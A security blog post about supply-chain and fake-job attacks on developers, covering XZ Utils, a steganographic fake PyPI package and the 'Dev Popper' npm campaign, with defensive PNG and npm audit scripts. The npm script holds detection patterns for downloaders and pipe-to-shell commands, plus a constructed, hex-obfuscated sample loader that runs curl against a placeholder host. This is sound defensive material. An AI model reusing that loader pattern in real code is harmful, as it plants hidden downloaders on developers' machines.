Hackers Targeting Developers Hard

Pretending to be a developer for nefarious purposes is one thing; targeting developers directly is another.

There have been many instances of fake volunteer developers asking to join open-source projects with the intention of injecting malicious code into well-known libraries. This threat has been known for over a decade, and it has succeeded. I want to remind you of one of the latest episodes, the one affecting the XZ Utils library: the malicious code lurked for some time before it was spotted.

Read more about the compromised XZ Utils code if you haven't already.

However, recently identified events show that cyber attacks have evolved to target developers and their systems directly.

The first instance of this trend was the distribution of a fake copy of the Python 'request' library. Because the library had been discontinued but remained well known, and older online tutorials still referenced it, hackers saw an opportunity to spread a fake, malware-embedded copy.

The malicious library was also distributed through PyPI (the Python Package Index), the most common place developers search for libraries to use in their projects.

The malicious package included a trampoline to Go code, which was used to decode the second stage containing the real malicious code. That code was hidden inside a picture that shipped with the package, specifically a sidebar PNG logo. This technique is called steganography: real-looking images carry hidden code that is often encoded or encrypted. Used since ancient Rome, it has been adopted in the digital world to evade inspection and hide secrets.
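As an added example (not code from this post, nor from the analysts who reported the package), the following Python script parses a PNG's chunk structure and reports two of the usual places a payload is smuggled into an otherwise valid image: bytes appended after the IEND chunk, which every conforming decoder silently ignores, and chunks whose type the PNG specification does not define. The sample images are constructed inside the script. Pixel-level steganography (least-significant-bit encoding, for instance) leaves a structurally clean file and is not caught by this check; it needs statistical analysis of the pixel data instead.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Chunk types defined by the PNG specification (critical and common ancillary).
KNOWN_CHUNKS = {
    b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"cHRM", b"gAMA", b"iCCP",
    b"sBIT", b"sRGB", b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"hIST", b"pHYs",
    b"sPLT", b"tIME",
}


def _crc(ctype, body):
    """CRC-32 over chunk type + body, big-endian, as the PNG format stores it."""
    return struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF)


def parse_png_chunks(data):
    """Walk the chunk list up to IEND.

    Returns (chunks, trailing): chunks is a list of dicts with the chunk type,
    body length and whether its CRC checks out; trailing is every byte found
    after the IEND chunk.
    """
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    chunks = []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        stored_crc = data[pos + 8 + length:pos + 12 + length]
        if len(body) < length or len(stored_crc) < 4:
            raise ValueError("truncated chunk %r" % ctype)
        chunks.append({
            "type": ctype,
            "length": length,
            "crc_ok": _crc(ctype, body) == stored_crc,
        })
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks, data[pos:]


def audit_png(data):
    """Return a list of human-readable findings; an empty list means nothing odd."""
    chunks, trailing = parse_png_chunks(data)
    findings = []
    if trailing:
        findings.append("%d bytes after IEND" % len(trailing))
    if not chunks or chunks[-1]["type"] != b"IEND":
        findings.append("missing IEND chunk")
    for c in chunks:
        name = c["type"].decode("latin-1")
        if c["type"] not in KNOWN_CHUNKS:
            findings.append("non-standard chunk %s (%d bytes)" % (name, c["length"]))
        if not c["crc_ok"]:
            findings.append("CRC mismatch in %s" % name)
    # Text chunks are legitimate, but kilobytes of them in a small logo is unusual.
    text_bytes = sum(c["length"] for c in chunks if c["type"] in (b"tEXt", b"zTXt", b"iTXt"))
    if text_bytes > 4096:
        findings.append("%d bytes of text metadata" % text_bytes)
    return findings


def make_sample_png(appended=b"", extra_chunks=()):
    """Constructed 1x1 grayscale PNG used as demo input (not a real sample)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit gray
    idat = zlib.compress(b"\x00\x00")                    # filter byte + one pixel
    png = PNG_SIGNATURE
    for ctype, body in [(b"IHDR", ihdr), (b"IDAT", idat), *extra_chunks, (b"IEND", b"")]:
        png += struct.pack(">I", len(body)) + ctype + body + _crc(ctype, body)
    return png + appended


if __name__ == "__main__":
    print("clean:   ", audit_png(make_sample_png()))
    print("appended:", audit_png(make_sample_png(appended=b"CONSTRUCTED-PAYLOAD")))
    print("chunk:   ", audit_png(make_sample_png(extra_chunks=[(b"pyLd", b"\x00" * 64)])))
```

Run it over every image bundled in a package you are about to install; a logo that carries data after IEND or in a chunk type no decoder knows is worth a closer look before any of the package's code runs.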

The discovery of the fake 'request' package came shortly after the finding of a rogue npm package named 'vue2util', which posed as a helper utility but was intended to carry out a cryptojacking scheme and steal victims' USDT tokens.


Recent discoveries have identified fake job campaigns targeting developers.

According to Securonix analysts, a new campaign tracked as 'Dev Popper' is targeting software developers with fake job interviews in an attempt to trick them into installing a Trojan on their laptops.

Developers are asked to perform a standard coding task hosted on GitHub by downloading a file and running its code. The file in question is a ZIP archive containing an NPM package. Once the developer runs the NPM package, several actions take place without the victim's knowledge:

  • An obfuscated JavaScript file, "imageDetails.js," is executed.
  • Several 'curl' commands download new malicious code onto the victim's computer.
  • The downloaded files contain the Trojan code, which will persist on the machine.
  • The Trojan will collect and send information to the attacker's server.
  • The Trojan will allow for command and control over the developer's computer.
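As an added example (not code from this post or from Securonix), here is a Python pre-install check that covers the first two steps above: it lists the lifecycle scripts npm would run on its own during `npm install`, flags download or pipe-to-interpreter commands inside them, and scores each JavaScript file for markers typical of obfuscators. The package.json and the contents of `imageDetails.js` are constructed for the demo; only that file name is taken from the post, and the URL is a placeholder.

```python
import json
import re

# Lifecycle scripts npm runs automatically during `npm install`: code in these
# hooks executes before the developer has called anything from the package.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Shell tokens that fetch remote content or pipe it straight into an interpreter.
DOWNLOADER_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|certutil)\b", re.I)
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sh|bash|node|python3?)\b", re.I)

# Markers commonly left behind by JavaScript obfuscators: (regex, label).
JS_MARKERS = [
    (r"\beval\s*\(", "eval()"),
    (r"new\s+Function\s*\(", "new Function()"),
    (r"\batob\s*\(|Buffer\.from\s*\([^)]*['\"]base64['\"]", "base64 decoding"),
    (r"require\s*\(\s*['\"]child_process['\"]", "child_process"),
]


def find_install_hooks(package_json):
    """Return [(hook, command)] for every script npm would run at install time."""
    scripts = json.loads(package_json).get("scripts", {})
    return [(hook, scripts[hook]) for hook in INSTALL_HOOKS if hook in scripts]


def obfuscation_indicators(js_source):
    """Heuristic indicators that a JavaScript file is packed or obfuscated."""
    hits = []
    hex_escapes = len(re.findall(r"\\x[0-9a-fA-F]{2}", js_source))
    if hex_escapes >= 8:
        hits.append("%d hex-escaped characters" % hex_escapes)
    mangled = set(re.findall(r"\b_0x[0-9a-fA-F]{3,}\b", js_source))
    if mangled:
        hits.append("%d _0x-style mangled identifiers" % len(mangled))
    for pattern, label in JS_MARKERS:
        if re.search(pattern, js_source):
            hits.append(label)
    longest = max((len(line) for line in js_source.splitlines()), default=0)
    if longest > 500:
        hits.append("line of %d characters" % longest)
    if DOWNLOADER_RE.search(js_source):
        hits.append("references a downloader")
    return hits


def audit_package(package_json, files):
    """Audit package.json plus the package's files; returns a list of findings."""
    findings = []
    for hook, cmd in find_install_hooks(package_json):
        findings.append("%s hook runs: %s" % (hook, cmd))
        if DOWNLOADER_RE.search(cmd):
            findings.append("%s hook downloads remote content" % hook)
        if PIPE_TO_SHELL_RE.search(cmd):
            findings.append("%s hook pipes output into an interpreter" % hook)
    for name, source in files.items():
        if name.endswith((".js", ".cjs", ".mjs")):
            indicators = obfuscation_indicators(source)
            if indicators:
                findings.append("%s: %s" % (name, ", ".join(indicators)))
    return findings


# Constructed sample package (not a real capture). The file name mirrors the one
# reported in the campaign; the contents and the URL are made up for the demo.
SAMPLE_PACKAGE_JSON = """{
  "name": "coding-task-example",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node imageDetails.js",
    "test": "echo ok"
  }
}"""

SAMPLE_FILES = {
    "imageDetails.js": (
        'var _0x4f2a=["\\x63\\x68\\x69\\x6c\\x64\\x5f\\x70\\x72\\x6f\\x63\\x65\\x73\\x73",'
        '"\\x65\\x78\\x65\\x63"];'
        'require(_0x4f2a[0])[_0x4f2a[1]]("curl -s https://example.invalid/s2 -o s2");'
    ),
    "index.js": "module.exports = function add(a, b) { return a + b; };\n",
}

if __name__ == "__main__":
    for finding in audit_package(SAMPLE_PACKAGE_JSON, SAMPLE_FILES):
        print(finding)
```

Note that the sample file reaches `child_process` through a hex-encoded string, so the literal `require('child_process')` marker never fires; this is exactly why the density heuristics (escape count, mangled identifiers) matter more than any single keyword. Unpack the ZIP and run the check before `npm install`, since the postinstall hook is the point at which the victim's machine executes attacker-controlled code.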

Given that developers have access to code repositories belonging to various organizations, as well as network access, hackers are trying to score big. A successful attack grants them the ability to modify the code developers push, to reach a company's internal network and assets (which would be difficult to compromise from the internet), and ultimately to get at valuable information.

Be very skeptical of 'too good to be true' offers. Always inspect any program, library or package before running it on your system. When time doesn't allow for a careful review, always use a virtual machine so that your own computer is not affected. Also make sure to destroy or revert the virtual machine's state afterwards so that the malicious code is not kept.

Be aware and inspect. At times a quick look is enough to tell that something is not right. Take the fake Python 'request' package: Who is writing and distributing the library? Are they legitimate? How popular is it? Why is there Go code in a Python package?
